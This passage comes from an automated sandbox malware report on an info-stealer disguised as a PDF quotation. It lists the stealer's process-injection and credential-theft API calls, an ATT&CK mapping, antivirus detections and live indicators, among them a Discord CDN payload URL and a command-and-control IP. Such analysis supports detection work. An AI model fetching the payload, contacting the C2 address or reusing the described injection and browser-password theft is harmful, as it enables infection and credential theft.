                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411446 FindFirstFileW,FindNextFileW,33_2_00411446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,33_2_0040955B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,33_2_004060B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00426222 mov eax, dword ptr fs:[00000030h]33_2_00426222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041EB27 mov eax, dword ptr fs:[00000030h]33_2_0041EB27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411B38 mov eax, dword ptr fs:[00000030h]33_2_00411B38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411B3F mov eax, dword ptr fs:[00000030h]33_2_00411B3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411E6D mov eax, dword ptr fs:[00000030h]33_2_00411E6D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00406045 GetProcessHeap,RtlAllocateHeap,33_2_00406045
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,33_2_00407B2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,33_2_00407D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,33_2_00413F7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe33_2_0041405F
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\donexx.exe "C:\Users\user\AppData\Local\Temp\donexx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,33_2_00410A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,33_2_00412E91
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q@<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}r{Win}rTHeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-`q
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR`q
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q9<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}THeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q:<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}rTHeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q?<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>{Win}r{Win}THeq
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $`q4<b>[ Program Manager]</b> (9/22/2023 7:02:56 AM)<br>@\`q
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\`q
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\donexx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeQueries volume information: C:\Users\user\AppData\Roaming\Fhzejfh.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00410E5E cpuid 33_2_00410E5E
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,33_2_00408D0F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_052A70F0 GetUserNameW,24_2_052A70F0

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000018.00000002.471458642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: POP3 Password 33_2_004099FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: SMTP Password 33_2_004099FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: IMAP Password 33_2_004099FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \Google\Chrome\User Data\Default\Login Data 33_2_0040B917
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \Chromium\User Data\Default\Login Data 33_2_0040B917
                  Source: Yara match File source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: donexx.exe PID: 6436, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 2472, type: MEMORYSTR
                  Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 24.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000018.00000002.471458642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                  Execution: 121 Windows Management Instrumentation; 1 Native API; 2 Service Execution; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
                  Persistence: 11 Create Account; 1 Windows Service; 1 Registry Run Keys / Startup Folder; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
                  Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 122 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
                  Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 12 Software Packing; 3 Masquerading; 131 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 122 Process Injection; 1 Hidden Files and Directories; 1 Hidden Users; Right-to-Left Override; Rename System Utilities
                  Credential Access: 3 OS Credential Dumping; 231 Input Capture; 1 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                  Discovery: 1 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 34 System Information Discovery; 321 Security Software Discovery; 131 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
                  Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 231 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
                  Command and Control: 22 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                  Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                  Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                  Impact: 1 Endpoint Denial of Service; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                  Behavior Graph ID: 1310586, Sample: QUOTATION_SEPT9FIBA00541#U0..., Startdate: 19/09/2023, Architecture: WINDOWS, Score: 100
                  Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
                  • QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe (started). Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    • AppLaunch.exe (started). DNS/IP: 162.159.133.233, 443, 49729, CLOUDFLARENETUS, United States; cdn.discordapp.com, 162.159.135.233, 49728, 80, CLOUDFLARENETUS, United States. Dropped: C:\Users\user\AppData\Local\Temp\donexx.exe, PE32. Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook
                      • donexx.exe (started). Dropped: C:\Users\user\AppData\Roaming\Fhzejfh.exe, PE32. Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionality to hide user accounts; Machine Learning detection for dropped file
                        • aspnet_compiler.exe (started). DNS/IP: 91.207.102.163, 26167, 49742, 49743, M247GB, Romania. Signatures: Contains functionality to hide user accounts; Contains functionality to inject threads in other processes; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
                    • cmd.exe (started). Signatures: Uses ipconfig to lookup or modify the Windows network settings
                      • conhost.exe (started)
                      • ipconfig.exe (started)
                    • dllhost.exe (started)
                    • cmd.exe (started)
                      • conhost.exe (started)
                      • ipconfig.exe (started)
                  • Fhzejfh.exe (started). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                  • Fhzejfh.exe (started)

                  Source | Detection | Scanner | Label
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe | 100% | Avira | TR/AD.GenSteal.vbicf
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe | 100% | Joe Sandbox ML |
                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe | 46% | Virustotal |
                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe | 100% | Avira | TR/AD.MortyStealer.wzwcq
                  C:\Users\user\AppData\Local\Temp\donexx.exe | 100% | Avira | TR/AD.MortyStealer.wzwcq
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\donexx.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\donexx.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                  C:\Users\user\AppData\Local\Temp\donexx.exe | 47% | Virustotal |
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                  C:\Users\user\AppData\Roaming\Fhzejfh.exe | 47% | Virustotal |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  https://cdn.discordappD | 0% | Avira URL Cloud | safe
                  http://cdn.discordap | 0% | Avira URL Cloud | safe
                  91.207.102.163 | 100% | Avira URL Cloud | malware
                  91.207.102.163 | 18% | Virustotal |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  cdn.discordapp.com | 162.159.135.233 | true | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  91.207.102.163 | true | 18%, Virustotal; Avira URL Cloud: malware | unknown
                  https://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe | false | | high
                  http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe | false | | high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netiQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://stackoverflow.com/q/14436606/23354QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000026.00000002.472797955.000000000264D000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/mgravell/protobuf-netJQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/11564914/23354;QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://stackoverflow.com/q/2152978/23354QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://cdn.discordapp.comAppLaunch.exe, 00000018.00000002.472848743.0000000006ED9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.discordappDAppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
